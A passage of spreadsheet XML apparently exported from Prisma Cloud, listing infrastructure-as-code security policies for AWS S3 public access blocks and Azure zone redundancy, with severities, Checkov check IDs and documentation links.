      <c r="B1457" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1457" s="2" t="inlineStr"/>
      <c r="D1457" t="inlineStr"/>
      <c r="E1457" t="inlineStr"/>
      <c r="F1457" t="inlineStr"/>
      <c r="G1457" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1457" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1457" t="inlineStr">
        <is>
          <t>AWS S3 Buckets has block public access setting disabled</t>
        </is>
      </c>
      <c r="L1457" t="inlineStr"/>
      <c r="M1457" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1457" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1457" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1457" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1457" t="inlineStr"/>
      <c r="R1457" t="inlineStr"/>
      <c r="S1457" t="inlineStr"/>
      <c r="T1457" t="b">
        <v>0</v>
      </c>
      <c r="U1457" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1457" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket-public-access-block</t>
        </is>
      </c>
      <c r="W1457" t="inlineStr">
        <is>
          <t>Ensure S3 bucket has block public ACLS enabled</t>
        </is>
      </c>
      <c r="X1457" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-19</t>
        </is>
      </c>
      <c r="Y1457" t="inlineStr"/>
      <c r="Z1457" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket_public_access_block"]}</t>
        </is>
      </c>
      <c r="AA1457" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1457" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1457" t="inlineStr">
        <is>
          <t>CKV_AWS_53</t>
        </is>
      </c>
      <c r="AD1457" t="b">
        <v>1</v>
      </c>
      <c r="AE1457" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1457" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>39bced69-0875-4e10-a8e6-bffb1c5b3319</t>
        </is>
      </c>
      <c r="AI1457" t="inlineStr"/>
      <c r="AJ1457" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1457" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" t="inlineStr"/>
      <c r="B1458" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1458" s="2" t="inlineStr"/>
      <c r="D1458" t="inlineStr"/>
      <c r="E1458" t="inlineStr"/>
      <c r="F1458" t="inlineStr"/>
      <c r="G1458" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1458" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1458" t="inlineStr">
        <is>
          <t>AWS S3 Bucket BlockPublicPolicy is not set to True</t>
        </is>
      </c>
      <c r="L1458" t="inlineStr"/>
      <c r="M1458" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1458" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1458" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1458" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1458" t="inlineStr"/>
      <c r="R1458" t="inlineStr"/>
      <c r="S1458" t="inlineStr"/>
      <c r="T1458" t="b">
        <v>0</v>
      </c>
      <c r="U1458" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1458" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket-public-access-block</t>
        </is>
      </c>
      <c r="W1458" t="inlineStr">
        <is>
          <t>Ensure S3 bucket has block public policy enabled</t>
        </is>
      </c>
      <c r="X1458" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-20</t>
        </is>
      </c>
      <c r="Y1458" t="inlineStr"/>
      <c r="Z1458" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket_public_access_block"]}</t>
        </is>
      </c>
      <c r="AA1458" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1458" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1458" t="inlineStr">
        <is>
          <t>CKV_AWS_54</t>
        </is>
      </c>
      <c r="AD1458" t="b">
        <v>1</v>
      </c>
      <c r="AE1458" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1458" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>93d2336f-0c9c-448e-b18e-bc7122cbf8a0</t>
        </is>
      </c>
      <c r="AI1458" t="inlineStr"/>
      <c r="AJ1458" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1458" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" t="inlineStr"/>
      <c r="B1459" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1459" s="2" t="inlineStr"/>
      <c r="D1459" t="inlineStr"/>
      <c r="E1459" t="inlineStr"/>
      <c r="F1459" t="inlineStr"/>
      <c r="G1459" t="b">
        <v>1</v>
      </c>
      <c r="H14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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1459" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1459" t="inlineStr">
        <is>
          <t>AWS S3 bucket IgnorePublicAcls is not set to True</t>
        </is>
      </c>
      <c r="L1459" t="inlineStr"/>
      <c r="M1459" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1459" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1459" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1459" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1459" t="inlineStr"/>
      <c r="R1459" t="inlineStr"/>
      <c r="S1459" t="inlineStr"/>
      <c r="T1459" t="b">
        <v>0</v>
      </c>
      <c r="U1459" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1459" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket-public-access-block</t>
        </is>
      </c>
      <c r="W1459" t="inlineStr">
        <is>
          <t>Ensure S3 bucket has ignore public ACLs enabled</t>
        </is>
      </c>
      <c r="X1459" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-21</t>
        </is>
      </c>
      <c r="Y1459" t="inlineStr"/>
      <c r="Z1459" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket_public_access_block"]}</t>
        </is>
      </c>
      <c r="AA1459" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1459" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1459" t="inlineStr">
        <is>
          <t>CKV_AWS_55</t>
        </is>
      </c>
      <c r="AD1459" t="b">
        <v>1</v>
      </c>
      <c r="AE1459" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1459" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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59" t="inlineStr">
        <is>
          <t>28a820e2-f227-45aa-a80c-1873efb2d0b1</t>
        </is>
      </c>
      <c r="AI1459" t="inlineStr"/>
      <c r="AJ1459" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1459" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" t="inlineStr"/>
      <c r="B1460" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1460" s="2" t="inlineStr"/>
      <c r="D1460" t="inlineStr"/>
      <c r="E1460" t="inlineStr"/>
      <c r="F1460" t="inlineStr"/>
      <c r="G1460" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1460" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-app</t>
        </is>
      </c>
      <c r="K1460" t="inlineStr">
        <is>
          <t>App Service Environment is not zone redundant</t>
        </is>
      </c>
      <c r="L1460" t="inlineStr"/>
      <c r="M1460" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1460" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1460" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1460" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1460" t="inlineStr"/>
      <c r="R1460" t="inlineStr"/>
      <c r="S1460" t="inlineStr"/>
      <c r="T1460" t="b">
        <v>0</v>
      </c>
      <c r="U1460" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1460" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-app-service-environment-v3</t>
        </is>
      </c>
      <c r="W1460" t="inlineStr">
        <is>
          <t>Ensure App Service Environment is zone redundant</t>
        </is>
      </c>
      <c r="X1460" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azure-231</t>
        </is>
      </c>
      <c r="Y1460" t="inlineStr"/>
      <c r="Z1460" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_app_service_environment_v3"]}</t>
        </is>
      </c>
      <c r="AA1460" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1460" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1460" t="inlineStr">
        <is>
          <t>CKV_AZURE_231</t>
        </is>
      </c>
      <c r="AD1460" t="b">
        <v>1</v>
      </c>
      <c r="AE1460" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1460" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>0da2edec-f295-4452-8312-47912edfb1c8</t>
        </is>
      </c>
      <c r="AI1460" t="inlineStr"/>
      <c r="AJ1460" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1460" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" t="inlineStr"/>
      <c r="B1461" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1461" s="2" t="inlineStr"/>
      <c r="D1461" t="inlineStr"/>
      <c r="E1461" t="inlineStr"/>
      <c r="F1461" t="inlineStr"/>
      <c r="G1461" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1461" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-container</t>
        </is>
      </c>
      <c r="K1461" t="inlineStr">
        <is>
          <t>Azure Container Registry (ACR) not zone redundant</t>
        </is>
      </c>
      <c r="L1461" t="inlineStr"/>
      <c r="M1461" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1461" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1461" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1461" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1461" t="inlineStr"/>
      <c r="R1461" t="inlineStr"/>
      <c r="S1461" t="inlineStr"/>
      <c r="T1461" t="b">
        <v>0</v>
      </c>
      <c r="U1461" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1461" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-container-registry</t>
        </is>
      </c>
      <c r="W1461" t="inlineStr">
        <is>
          <t>Ensure Azure Container Registry (ACR) is zone redundant</t>
        </is>
      </c>
      <c r="X1461" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-233</t>
        </is>
      </c>
      <c r="Y1461" t="inlineStr"/>
      <c r="Z1461" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA1461" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1461" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1461" t="inlineStr">
        <is>
          <t>CKV_AZURE_233</t>
        </is>
      </c>
      <c r="AD1461" t="b">
        <v>1</v>
      </c>
      <c r="AE1461" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1461" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>9a454dce-8942-4afd-8351-44b68634ef01</t>
        </is>
      </c>
      <c r="AI1461" t="inlineStr"/>
      <c r="AJ1461" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1461" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" t="inlineStr"/>
      <c r="B1462" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1462" s="2" t="inlineStr"/>
      <c r="D1462" t="inlineStr"/>
      <c r="E1462" t="inlineStr"/>
      <c r="F1462" t="inlineStr"/>
      <c r="G1462" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1462" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-eventhub</t>
        </is>
      </c>
      <c r="K1462" t="inlineStr">
        <is>
          <t>Azure Event Hub Namespace is not zone redundant</t>
        </is>
      </c>
      <c r="L1462" t="inlineStr"/>
      <c r="M1462" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1462" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1462" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1462" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1462" t="inlineStr"/>
      <c r="R1462" t="inlineStr"/>
      <c r="S1462" t="inlineStr"/>
      <c r="T1462" t="b">
        <v>0</v>
      </c>
      <c r="U1462" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1462" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-eventhub-namespace</t>
        </is>
      </c>
      <c r="W1462" t="inlineStr">
        <is>
          <t>Ensure the Azure Event Hub Namespace is zone redundant</t>
        </is>
      </c>
      <c r="X1462" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azure-228</t>
        </is>
      </c>
      <c r="Y1462" t="inlineStr"/>
      <c r="Z1462" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_eventhub_namespace"]}</t>
        </is>
      </c>
      <c r="AA1462" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1462" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1462" t="inlineStr">
        <is>
          <t>CKV_AZURE_228</t>
        </is>
      </c>
      <c r="AD1462" t="b">
        <v>1</v>
      </c>
      <c r="AE1462" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1462" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>950ce5b8-656c-4e0f-9555-85110cc0cbbd</t>
        </is>
      </c>
      <c r="AI1462" t="inlineStr"/>
      <c r="AJ1462" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1462" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" t="inlineStr"/>
      <c r="B1463" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1463" s="2" t="inlineStr"/>
      <c r="D1463" t="inlineStr"/>
      <c r="E1463" t="inlineStr"/>
      <c r="F1463" t="inlineStr"/>
      <c r="G1463" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1463" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-mssql</t>
        </is>
      </c>
      <c r="K1463" t="inlineStr">
        <is>
          <t>Azure SQL Database Namespace is not zone redundant</t>
        </is>
      </c>
      <c r="L1463" t="inlineStr"/>
      <c r="M1463" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1463" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1463" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1463" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1463" t="inlineStr"/>
      <c r="R1463" t="inlineStr"/>
      <c r="S1463" t="inlineStr"/>
      <c r="T1463" t="b">
        <v>0</v>
      </c>
      <c r="U1463" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1463" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-mssql-database</t>
        </is>
      </c>
      <c r="W1463" t="inlineStr">
        <is>
          <t>Ensure the Azure SQL Database Namespace is zone redundant</t>
        </is>
      </c>
      <c r="X1463" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azure-229</t>
        </is>
      </c>
      <c r="Y1463" t="inlineStr"/>
      <c r="Z1463" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_mssql_database"]}</t>
        </is>
      </c>
      <c r="AA1463" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1463" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1463" t="inlineStr">
        <is>
          <t>CKV_AZURE_229</t>
        </is>
      </c>
      <c r="AD1463" t="b">
        <v>1</v>
      </c>
      <c r="AE1463" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1463" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>91bd3941-951c-419c-8fc8-1f5fdfa78af1</t>
        </is>
      </c>
      <c r="AI1463" t="inlineStr"/>
      <c r="AJ1463" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1463" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" t="inlineStr"/>
      <c r="B1464" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1464" s="2" t="inlineStr"/>
      <c r="D1464" t="inlineStr"/>
      <c r="E1464" t="inlineStr"/>
      <c r="F1464" t="inlineStr"/>
      <c r="G1464" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1464" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-redis</t>
        </is>
      </c>
      <c r="K1464" t="inlineStr">
        <is>
          <t>Standard Replication is not enabled</t>
        </is>
      </c>
      <c r="L1464" t="inlineStr"/>
      <c r="M1464" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1464" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1464" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1464" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1464" t="inlineStr"/>
      <c r="R1464" t="inlineStr"/>
      <c r="S1464" t="inlineStr"/>
      <c r="T1464" t="b">
        <v>0</v>
      </c>
      <c r="U1464" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1464" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-redis-cache</t>
        </is>
      </c>
      <c r="W1464" t="inlineStr">
        <is>
          <t>Standard Replication should be enabled</t>
        </is>
      </c>
      <c r="X1464" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azure-230</t>
        </is>
      </c>
      <c r="Y1464" t="inlineStr"/>
      <c r="Z1464" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_redis_cache"]}</t>
        </is>
      </c>
      <c r="AA1464" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1464" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1464" t="inlineStr">
        <is>
          <t>CKV_AZURE_230</t>
        </is>
      </c>
      <c r="AD1464" t="b">
        <v>1</v>
      </c>
      <c r="AE1464" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1464" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>67a06800-77a3-4497-9e11-b5a2a8e35de8</t>
        </is>
      </c>
      <c r="AI1464" t="inlineStr"/>
      <c r="AJ1464" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1464" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" t="inlineStr"/>
      <c r="B1465" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1465" s="2" t="inlineStr"/>
      <c r="D1465" t="inlineStr"/>
      <c r="E1465" t="inlineStr"/>
      <c r="F1465" t="inlineStr"/>
      <c r="G1465" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1465" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-service</t>
        </is>
      </c>
      <c r="K1465" t="inlineStr">
        <is>
          <t>App Service Plan is not zone redundant</t>
        </is>
      </c>
      <c r="L1465" t="inlineStr"/>
      <c r="M1465" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1465" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1465" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1465" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1465" t="inlineStr"/>
      <c r="R1465" t="inlineStr"/>
      <c r="S1465" t="inlineStr"/>
      <c r="T1465" t="b">
        <v>0</v>
      </c>
      <c r="U1465" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1465" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-service-plan</t>
        </is>
      </c>
      <c r="W1465" t="inlineStr">
        <is>
          <t>Ensure the App Service Plan is zone redundant</t>
        </is>
      </c>
      <c r="X1465" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azure-225</t>
        </is>
      </c>
      <c r="Y1465" t="inlineStr"/>
      <c r="Z1465" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_service_plan"]}</t>
        </is>
      </c>
      <c r="AA1465" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1465" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1465" t="inlineStr">
        <is>
          <t>CKV_AZURE_225</t>
        </is>
      </c>
      <c r="AD1465" t="b">
        <v>1</v>
      </c>
      <c r="AE1465" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1465" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>089b5e2b-1f7b-4d7c-9472-98471c13c382</t>
        </is>
      </c>
      <c r="AI1465" t="inlineStr"/>
      <c r="AJ1465" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1465" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" t="inlineStr"/>
      <c r="B1466" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1466" s="2" t="inlineStr"/>
      <c r="D1466" t="inlineStr"/>
      <c r="E1466" t="inlineStr"/>
      <c r="F1466" t="inlineStr"/>
      <c r="G1466" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1466" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-storage</t>
        </is>
      </c>
      <c r="K1466" t="inlineStr">
        <is>
          <t>Storage Account name does not follow naming rules</t>
        </is>
      </c>
      <c r="L1466" t="inlineStr"/>
      <c r="M1466" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1466" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1466" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1466" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1466" t="inlineStr"/>
      <c r="R1466" t="inlineStr"/>
      <c r="S1466" t="inlineStr"/>
      <c r="T1466" t="b">
        <v>0</v>
      </c>
      <c r="U1466" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1466" t="inlineStr">
        <is>
          <t>IaC:Storage:azure-storage-account</t>
        </is>
      </c>
      <c r="W1466" t="inlineStr">
        <is>
          <t>Ensure Storage Accounts adhere to the naming rules</t>
        </is>
      </c>
      <c r="X1466" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules</t>
        </is>
      </c>
      <c r="Y1466" t="inlineStr"/>
      <c r="Z1466" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA1466" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1466" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1466" t="inlineStr">
        <is>
          <t>CKV_AZURE_43</t>
        </is>
      </c>
      <c r="AD1466" t="b">
        <v>1</v>
      </c>
      <c r="AE1466" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1466" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>f06c6dbe-be9e-4966-b9ac-18fbe7f016c0</t>
        </is>
      </c>
      <c r="AI1466" t="inlineStr"/>
      <c r="AJ1466" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1466" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" t="inlineStr"/>
      <c r="B1467" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1467" s="2" t="inlineStr"/>
      <c r="D1467" t="inlineStr"/>
      <c r="E1467" t="inlineStr"/>
      <c r="F1467" t="inlineStr"/>
      <c r="G1467" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1467" t="inlineStr">
        <is>
          <t>IaC:Storage:github-actions</t>
        </is>
      </c>
      <c r="K1467" t="inlineStr">
        <is>
